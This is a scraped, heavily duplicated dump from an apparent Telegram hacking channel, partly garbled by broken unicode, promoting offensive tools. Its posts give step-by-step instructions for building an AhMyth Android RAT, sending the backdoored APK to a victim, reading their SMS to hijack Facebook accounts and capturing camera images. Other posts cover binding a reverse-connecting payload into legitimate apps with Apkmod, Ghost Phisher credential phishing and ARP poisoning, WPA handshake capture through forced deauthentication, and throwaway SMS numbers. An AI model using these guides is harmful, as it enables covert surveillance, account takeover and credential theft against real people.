โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆGit Best Tools Hacking For Kali Linux 2018
t.me/iOSDeveloppers
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/Ha3MrX/GitTool
2) cd GitTool
3) chmod +x gittool.sh
4) ./gittool.sh
๐ฆVid Tutorial
> https://www.youtube.com/watch?v=APkZOXJ2rnk
๐ฆFeatures:
See screanshaot below iam sure you will like this tool
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆGit Best Tools Hacking For Kali Linux 2018
t.me/iOSDeveloppers
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/Ha3MrX/GitTool
2) cd GitTool
3) chmod +x gittool.sh
4) ./gittool.sh
๐ฆVid Tutorial
> https://www.youtube.com/watch?v=APkZOXJ2rnk
๐ฆFeatures:
See screanshaot below iam sure you will like this tool
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
IOS JAILBREAK BY UNDERCODE TESTING OFFICIAL
WELCOME TO UNDERCODE TESTING
FOR IOS JAILBREAK NEWS & TRICKS
๐ ถ๐ ธ๐๐ ป๐ฐ๐ฑ
@UndercOdeTesting
๐๐พ๐๐๐๐ฑ๐ ด
@UnderCodeTestingCompany
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTestingCompany
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestingCompany
๐๐๐ ธ๐๐๐ ด๐
@UndercOdeTC
UNDERCODE.ORG
FOR IOS JAILBREAK NEWS & TRICKS
๐ ถ๐ ธ๐๐ ป๐ฐ๐ฑ
@UndercOdeTesting
๐๐พ๐๐๐๐ฑ๐ ด
@UnderCodeTestingCompany
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTestingCompany
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestingCompany
๐๐๐ ธ๐๐๐ ด๐
@UndercOdeTC
UNDERCODE.ORG
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆUnderstand before attack how it works
> How do hackers or remote attackers obtain the WPA or WPA2 Handshake from a wireless access point easily?
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Communication Negotiation
When the connection is first established between two modems, the negotiation of communication restrictions and boundaries occurs for a brief period of time. Afterwards, the infamous "squealing" noise that people hear from old, dial-up modems sporting speaker outputs (it's a sound that modifies its pitch a hundred times every second) once the connection has been successfully made is the aural manifestation of two modems engaging in the handshake process. Thereafter, once everything has been agreed upon in regards to parameters, they're (the parameters) are used to offer streamlined information transmission over the channel as a function of its capacity and quality.
๐ฆFree High Quality WiFi
Although handshakes are more often than not what hackers need to capture in order to gain unauthorized access to systems and networksโor at the very least, get free, high-quality WiFi superior to those found in coffee shops and librariesโit's a necessary and unavoidable step to ensuring smooth connections from two otherwise different and normally mismatched systems. In turn, a Wired Protected Access or WPA handshake to keep intruders or unauthorized users from accessing the network (e.g., a four-way Temporal Key Integrity Protocol or TKIP handshake, with TKIP referring to one of many encryption algorithms that WPA supports).
๐ฆWPA Handshake Exploit
As for using WPA handshakes as exploits for security breaches, there are a variety of methods suited for this hacking task. Any hacker who wants to capture a four-way TKIP handshake without any help will probably have to observe Internet traffic for hours-on-end, patiently stalking for a client to link to a network. As easier way to capture handshakes for hacking purposes involves the use of a hacking tool called Aircrack-ng and forced deauthentication of a connected client PC in order to make him reconnect back up to the server exactly when you want him to connect.
๐ฆAuthentication Capture
Ironically enough, it's during the procedure wherein the encrypted WPA key is re-exchanged that a connection is most vulnerable for hacker attackโthe very process needed to protect a network can open it up to attack, like barging into a house while someone is in the middle of bolting the locks on his doors. Once the full authentication handshake has been captured from the client and an access point, the hacker can easily decrypt the information behind the handshake, thus allowing him the key to access the previously impenetrable network.
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆUnderstand before attack how it works
> How do hackers or remote attackers obtain the WPA or WPA2 Handshake from a wireless access point easily?
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Communication Negotiation
When the connection is first established between two modems, the negotiation of communication restrictions and boundaries occurs for a brief period of time. Afterwards, the infamous "squealing" noise that people hear from old, dial-up modems sporting speaker outputs (it's a sound that modifies its pitch a hundred times every second) once the connection has been successfully made is the aural manifestation of two modems engaging in the handshake process. Thereafter, once everything has been agreed upon in regards to parameters, they're (the parameters) are used to offer streamlined information transmission over the channel as a function of its capacity and quality.
๐ฆFree High Quality WiFi
Although handshakes are more often than not what hackers need to capture in order to gain unauthorized access to systems and networksโor at the very least, get free, high-quality WiFi superior to those found in coffee shops and librariesโit's a necessary and unavoidable step to ensuring smooth connections from two otherwise different and normally mismatched systems. In turn, a Wired Protected Access or WPA handshake to keep intruders or unauthorized users from accessing the network (e.g., a four-way Temporal Key Integrity Protocol or TKIP handshake, with TKIP referring to one of many encryption algorithms that WPA supports).
๐ฆWPA Handshake Exploit
As for using WPA handshakes as exploits for security breaches, there are a variety of methods suited for this hacking task. Any hacker who wants to capture a four-way TKIP handshake without any help will probably have to observe Internet traffic for hours-on-end, patiently stalking for a client to link to a network. As easier way to capture handshakes for hacking purposes involves the use of a hacking tool called Aircrack-ng and forced deauthentication of a connected client PC in order to make him reconnect back up to the server exactly when you want him to connect.
๐ฆAuthentication Capture
Ironically enough, it's during the procedure wherein the encrypted WPA key is re-exchanged that a connection is most vulnerable for hacker attackโthe very process needed to protect a network can open it up to attack, like barging into a house while someone is in the middle of bolting the locks on his doors. Once the full authentication handshake has been captured from the client and an access point, the hacker can easily decrypt the information behind the handshake, thus allowing him the key to access the previously impenetrable network.
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆANY PAGES FOR CREATE VIRTUAL NUMBERS๐ฆ
t.me/UnderCodeTestingOfficial
To receive your messages of confirmation!
โฉโฉ1. Receivefreesms.net
2. Sms-receive.net
3. Receive-a-sms.comโฉ
4. โฆHs3x.comโฉ
5. Receive-sms-now.com - (There are Russian numbers)
6. Smsreceivefree.com
7. Receivesmsonline.com
8. Getsms.org - (ะ ัั.ะฝะพะผะตัะฐ)
9. Tempsms.ru - (Rus.number)
10. Numberforsms.com - (There are Russian numberps)
11. Sonetel.com
12. Smska.us - (Rus.number)
13. Sellaite.com
14. Sms.ink - (Rus.numera)
15. Proovl.com
16. Onlinesim.ru
17. Zadarma.com - (There are Russian numbers)
18. Smsc.ru - (You need to register, there are Russian and Ukrainian numbers)
19. Freevirtualnumber.skycallbd.com
20. Getfreesmsnumber.com
21. Receive-smsonline.net - Yearly design
22. Receivefreesms.com
23. Receivesmsverification.com
24. Sms-online.co
25. Ireceivesmsonline.com
26. Receive-sms-online.com - (There are a number of scores)
27. Receive-sms-free.com
28. Esendex.com.au - (Registration required)
29. Receivesmsonline.in
๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ
@kadrino (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆANY PAGES FOR CREATE VIRTUAL NUMBERS๐ฆ
t.me/UnderCodeTestingOfficial
To receive your messages of confirmation!
โฉโฉ1. Receivefreesms.net
2. Sms-receive.net
3. Receive-a-sms.comโฉ
4. โฆHs3x.comโฉ
5. Receive-sms-now.com - (There are Russian numbers)
6. Smsreceivefree.com
7. Receivesmsonline.com
8. Getsms.org - (ะ ัั.ะฝะพะผะตัะฐ)
9. Tempsms.ru - (Rus.number)
10. Numberforsms.com - (There are Russian numberps)
11. Sonetel.com
12. Smska.us - (Rus.number)
13. Sellaite.com
14. Sms.ink - (Rus.numera)
15. Proovl.com
16. Onlinesim.ru
17. Zadarma.com - (There are Russian numbers)
18. Smsc.ru - (You need to register, there are Russian and Ukrainian numbers)
19. Freevirtualnumber.skycallbd.com
20. Getfreesmsnumber.com
21. Receive-smsonline.net - Yearly design
22. Receivefreesms.com
23. Receivesmsverification.com
24. Sms-online.co
25. Ireceivesmsonline.com
26. Receive-sms-online.com - (There are a number of scores)
27. Receive-sms-free.com
28. Esendex.com.au - (Registration required)
29. Receivesmsonline.in
๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ๐ฆ
@kadrino (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆHACK ANDROID REMONTLY/MONITOR + SMS EASY Steps... (EXPLOITE)BY UnderCode For medium experiences hacker on kali/ Wndows/termux...
(t.me/UnderCodeTestingOfficial)
๐ฆInstallisation & Run:
1) Download & Install AhMyth via 2 popular ways
A- using directly use the source code from GitHub
B- use the binaries they provide
๐ฆ SO LET S START: WITH METHODE 1 (A)
1) If you chose to start with the source code, then you'll need to check that you have a few prerequisites installed.
> Java โ it's used to generate the APK backdoor.
> Electron โ it's used to start the desktop application.
(https://github.com/electron/electron)
> Electron-builder and Electron-packer โ they are used to build the binaries for macOS, Windows, and Linux.
(https://github.com/electron-userland/electron-builder)
2) After instlling Those requestsOpen Terminal & Type:
> git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
3) cd AhMyth-Android-RAT/AhMyth-Server
4) > npm start
5) This program is still in beta development, and as such, it isn't as robust as it could be. Some users have gotten errors when attempting to start it. If you do, try again running it as root, as seen below.
> sudo npm start --unsafe-perm
๐ฆIF USING METHODE B (From Binaries):
1) The source code is one way to download it, but if you're lazy like me, there's a slightly easier way โ use the binaries
2) Download or clone
> https://github.com/AhMyth/AhMyth-Android-RAT/releases
THEY HAVE FOR WINDOWS & LINUX
3) After installing :
> Build an APK
Now that we have the program up and running, it's time to build an Android application with a backdoor: ยซ just click on "Build."ยป
> At the top of the screen, select "APK Builder." The first thing to change is "Source IP." This needs to be the IP address of the computer you'll be sending and receiving commands from.
4) NOW navigate to to "C:\Users\UserName\AhMyth\Output" to find the built APK.
5) Now that you have a working APK, it's time to deploy it by downloading it on the target Android device( sending to victime)
6) For Auto install (same network adress)
If the Android phone doesn't want to install it, they probably never enabled "Unknown sources" in their settings. Open up the Settings, then go to "Security" and check "Unknown sources." This is how apps that come from outside the Google Play Store can be installed.
7) WELL DONE GET THEIR SMS EXAMPLE
If you really like to sow chaos, then you'll love this next feature: the ability to not only read but also send "SMS" messages. A simple way to use this would be to hack someone's Facebook by resetting their password with an SMS text, then use the code that is sent
8) DON T MIND WE CAN ALSO GET CAMERA IMAGES....
๐ฆTESTED BY undercOde on
> Win
> DEBIAN
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆHACK ANDROID REMONTLY/MONITOR + SMS EASY Steps... (EXPLOITE)BY UnderCode For medium experiences hacker on kali/ Wndows/termux...
(t.me/UnderCodeTestingOfficial)
๐ฆInstallisation & Run:
1) Download & Install AhMyth via 2 popular ways
A- using directly use the source code from GitHub
B- use the binaries they provide
๐ฆ SO LET S START: WITH METHODE 1 (A)
1) If you chose to start with the source code, then you'll need to check that you have a few prerequisites installed.
> Java โ it's used to generate the APK backdoor.
> Electron โ it's used to start the desktop application.
(https://github.com/electron/electron)
> Electron-builder and Electron-packer โ they are used to build the binaries for macOS, Windows, and Linux.
(https://github.com/electron-userland/electron-builder)
2) After instlling Those requestsOpen Terminal & Type:
> git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
3) cd AhMyth-Android-RAT/AhMyth-Server
4) > npm start
5) This program is still in beta development, and as such, it isn't as robust as it could be. Some users have gotten errors when attempting to start it. If you do, try again running it as root, as seen below.
> sudo npm start --unsafe-perm
๐ฆIF USING METHODE B (From Binaries):
1) The source code is one way to download it, but if you're lazy like me, there's a slightly easier way โ use the binaries
2) Download or clone
> https://github.com/AhMyth/AhMyth-Android-RAT/releases
THEY HAVE FOR WINDOWS & LINUX
3) After installing :
> Build an APK
Now that we have the program up and running, it's time to build an Android application with a backdoor: ยซ just click on "Build."ยป
> At the top of the screen, select "APK Builder." The first thing to change is "Source IP." This needs to be the IP address of the computer you'll be sending and receiving commands from.
4) NOW navigate to to "C:\Users\UserName\AhMyth\Output" to find the built APK.
5) Now that you have a working APK, it's time to deploy it by downloading it on the target Android device( sending to victime)
6) For Auto install (same network adress)
If the Android phone doesn't want to install it, they probably never enabled "Unknown sources" in their settings. Open up the Settings, then go to "Security" and check "Unknown sources." This is how apps that come from outside the Google Play Store can be installed.
7) WELL DONE GET THEIR SMS EXAMPLE
If you really like to sow chaos, then you'll love this next feature: the ability to not only read but also send "SMS" messages. A simple way to use this would be to hack someone's Facebook by resetting their password with an SMS text, then use the code that is sent
8) DON T MIND WE CAN ALSO GET CAMERA IMAGES....
๐ฆTESTED BY undercOde on
> Win
> DEBIAN
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTopic termux/kali onex is a hacking tool installer and package manager for hackers. Onex is a library of all hacking tools for Turmex and other Linux distributions. onex can install any third party tool or any hacking tool for you.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update
2) apt install git
3) git clone https://github.com/Rajkumrdusad/onex.git
4) chmod +x onex/install
5) sh onex/install if not work than use ./onex/install
6) onex -h or onex help for help.
๐ฆOptions :
> onex install [tool_name] install any tool.
> onex -i [tool_name] install any tool.
> onex search [tool_name] search any tool.
> onex -s [tool_name] search any tool.
> onex list list all tools.
> onex list -a list all tools.
> onex -l list all tools.
> onex -l -a list all tools.
> onex help get help.
> onex -h get help.
type
> onex star: to start onex menu mode.
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTopic termux/kali onex is a hacking tool installer and package manager for hackers. Onex is a library of all hacking tools for Turmex and other Linux distributions. onex can install any third party tool or any hacking tool for you.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) apt update
2) apt install git
3) git clone https://github.com/Rajkumrdusad/onex.git
4) chmod +x onex/install
5) sh onex/install if not work than use ./onex/install
6) onex -h or onex help for help.
๐ฆOptions :
> onex install [tool_name] install any tool.
> onex -i [tool_name] install any tool.
> onex search [tool_name] search any tool.
> onex -s [tool_name] search any tool.
> onex list list all tools.
> onex list -a list all tools.
> onex -l list all tools.
> onex -l -a list all tools.
> onex help get help.
> onex -h get help.
type
> onex star: to start onex menu mode.
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆApkmod can decompile, recompile, sign APK, and bind the payload with any legit APP
t.me/iOsDeveloppers
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> Termux
1) cd $HOME
2) wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
3) Execute the script sh setup.sh
4) For decompiling apkmod -d /path/to/inapp.apk -o /path/to/outdirectory. It will decompile inapp.apk into outdirectory folder.
5) For recompiling apkmod -r /path/to/indirectory -o /path/to/outapp.apk. It will recompile indirectory ( where decompiled files are exists ) into outapp.apk.
6) For signing apkmod -s /path/to/unsignedapp.apk -o /path/to/signedapp.apk. It will sign unsignedapp.apk and saves output ( signed app ) to signedapp.apk.
7) For binding apkmod -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444. It will bind payload with originalApp.apk and saves final binded app to binded.apk.
8) Now you can use a optional option -a to use aapt2 for binding and recompiling. Why aapt2 ? Because some apps can't recompile with aapt but aapt2 can do it. But I can't drop aapt support because some apps can't recompile with aapt2 so first recompile or bind without aapt2 ( -a ) then if you failed then try with aapt2. For example apkmod -a -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444.
9) Now payload Sucess
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆApkmod can decompile, recompile, sign APK, and bind the payload with any legit APP
t.me/iOsDeveloppers
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> Termux
1) cd $HOME
2) wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
3) Execute the script sh setup.sh
4) For decompiling apkmod -d /path/to/inapp.apk -o /path/to/outdirectory. It will decompile inapp.apk into outdirectory folder.
5) For recompiling apkmod -r /path/to/indirectory -o /path/to/outapp.apk. It will recompile indirectory ( where decompiled files are exists ) into outapp.apk.
6) For signing apkmod -s /path/to/unsignedapp.apk -o /path/to/signedapp.apk. It will sign unsignedapp.apk and saves output ( signed app ) to signedapp.apk.
7) For binding apkmod -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444. It will bind payload with originalApp.apk and saves final binded app to binded.apk.
8) Now you can use a optional option -a to use aapt2 for binding and recompiling. Why aapt2 ? Because some apps can't recompile with aapt but aapt2 can do it. But I can't drop aapt support because some apps can't recompile with aapt2 so first recompile or bind without aapt2 ( -a ) then if you failed then try with aapt2. For example apkmod -a -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444.
9) Now payload Sucess
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMake your net speed more faster via termux:
bash script ( no exception handling ) to update no-ip DNS to avoid 30 day expiration
facebook.com/UnderCodeTestingCompanie
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/hax4us/no-ip-updater.git
2) cd no-ip-updater
3) bash setup
4) it will ask for your email id (which was registered in no-ip) , password and your Hostname like demo.ddns.net
5) Now noipupdater will update the hostname with your public IP
Thats all ;)
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMake your net speed more faster via termux:
bash script ( no exception handling ) to update no-ip DNS to avoid 30 day expiration
facebook.com/UnderCodeTestingCompanie
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/hax4us/no-ip-updater.git
2) cd no-ip-updater
3) bash setup
4) it will ask for your email id (which was registered in no-ip) , password and your Hostname like demo.ddns.net
5) Now noipupdater will update the hostname with your public IP
Thats all ;)
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆbest Phishing tool in world
Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks.
Automatically exported from code .google .com/ p/ghost-phisher
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/savio-code/ghost-phisher
2) cd ghost-phisher
3) again cd ghost-phisher
4) run as python after comple requests
python ghost.py
5) for kali or any debian forkes
> root@host:~# dpkg -i ghost-phisher_1.5_all.deb
๐ฆRequirements:
1. Aircrack-NG
2. Python-Scapy
3. Python Qt4
4. Python
5. Subversion
6. Xterm
7. Metasploit Framework (Optional)
๐ฆFeatures:
Ghost Phisher currently supports the following features:
1. HTTP Server
2. Inbuilt RFC 1035 DNS Server
3. Inbuilt RFC 2131 DHCP Server
4. Webpage Hosting and Credential Logger (Phishing)
5. Wifi Access point Emulator
6. Session Hijacking (Passive and Ethernet Modes)
7. ARP Cache Poisoning (MITM and DOS Attacks)
8. Penetration using Metasploit Bindings
9. Automatic credential logging using SQlite Database
10. Update Support
๐ฆUse For learn not For Harm!!!!!!๐ฆ
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆbest Phishing tool in world
Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks.
Automatically exported from code .google .com/ p/ghost-phisher
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/savio-code/ghost-phisher
2) cd ghost-phisher
3) again cd ghost-phisher
4) run as python after comple requests
python ghost.py
5) for kali or any debian forkes
> root@host:~# dpkg -i ghost-phisher_1.5_all.deb
๐ฆRequirements:
1. Aircrack-NG
2. Python-Scapy
3. Python Qt4
4. Python
5. Subversion
6. Xterm
7. Metasploit Framework (Optional)
๐ฆFeatures:
Ghost Phisher currently supports the following features:
1. HTTP Server
2. Inbuilt RFC 1035 DNS Server
3. Inbuilt RFC 2131 DHCP Server
4. Webpage Hosting and Credential Logger (Phishing)
5. Wifi Access point Emulator
6. Session Hijacking (Passive and Ethernet Modes)
7. ARP Cache Poisoning (MITM and DOS Attacks)
8. Penetration using Metasploit Bindings
9. Automatic credential logging using SQlite Database
10. Update Support
๐ฆUse For learn not For Harm!!!!!!๐ฆ
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆLive Malware Tools:
theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://www.github.com/ytisf/theZoo
2) cd theZoo
3) pip install --user -r requirements.txt
4) Start by running the console:
> python theZoo.py
5) /conf - The conf folder holds files relevant to the particular running of the program but are not part of the application. You can find the EULA file in the conf and more.
6) /imports - Contains .py import files used by the rest of the application
7) /malwares/Binaries - The actual malwares samples - be careful! These are very live.
8) /malware/Source - Malware source code.
> Malware under the folder Original is supposed to be (NO PROMISES!) the original source of the malware that leaked. Malware under the folder Reversed is either reversed, decompiled or partially reconstructed.
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆLive Malware Tools:
theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://www.github.com/ytisf/theZoo
2) cd theZoo
3) pip install --user -r requirements.txt
4) Start by running the console:
> python theZoo.py
5) /conf - The conf folder holds files relevant to the particular running of the program but are not part of the application. You can find the EULA file in the conf and more.
6) /imports - Contains .py import files used by the rest of the application
7) /malwares/Binaries - The actual malwares samples - be careful! These are very live.
8) /malware/Source - Malware source code.
> Malware under the folder Original is supposed to be (NO PROMISES!) the original source of the malware that leaked. Malware under the folder Reversed is either reversed, decompiled or partially reconstructed.
E N J O Y
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (og)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆOFFICIAL TORJANS:
Trojan features multiple protocols over TLS to avoid both active/passive detections and ISP QoS limitations.
> Trojan is not a fixed program or protocol. It's an idea, an idea that imitating the most common service, to an extent that it behaves identically, could help you get across the Great FireWall permanently, without being identified ever
t.me/UndercOdeTestingOfficial
> https://github.com/trojan-gfw/trojan/zipball/master
> https://github.com/trojan-gfw/trojan/tarball/master
๐ฆTO run Require:
1) CMake >= 3.7.2
2) Boost >= 1.66.0
3) OpenSSL >= 1.0.2
4) libmysqlclient
๐ฆRun via
TROJAN_DEBIAN_VERSION="1.10.0-3"
1) sudo apt update
2) sudo apt install build-essential devscripts debhelper cmake libboost-system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev python3 curl openssl
3) dget http://ftp.us.debian.org/debian/pool/main/t/trojan/trojan_${TROJAN_DEBIAN_VERSION}.dsc
4) dpkg-source -x trojan_${TROJAN_DEBIAN_VERSION}.dsc trojan-${TROJAN_DEBIAN_VERSION}
5) cd trojan-${TROJAN_DEBIAN_VERSION}/
dpkg-buildpackage -us -uc -d
6) sudo dpkg -i ../trojan_${TROJAN_DEBIAN_VERSION}_$(dpkg-architecture -q DEB_BUILD_ARCH).deb
7) sudo apt purge devscripts debhelper cmake # you can remove it now
๐ฆUbanto:
18.10 & 19.04
1) sudo add-apt-repository ppa:greaterfire/trojan
2) sudo apt-get update
3) sudo apt-get install trojan
>= 19.04
> sudo apt-get install trojan
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆOFFICIAL TORJANS:
Trojan features multiple protocols over TLS to avoid both active/passive detections and ISP QoS limitations.
> Trojan is not a fixed program or protocol. It's an idea, an idea that imitating the most common service, to an extent that it behaves identically, could help you get across the Great FireWall permanently, without being identified ever
t.me/UndercOdeTestingOfficial
> https://github.com/trojan-gfw/trojan/zipball/master
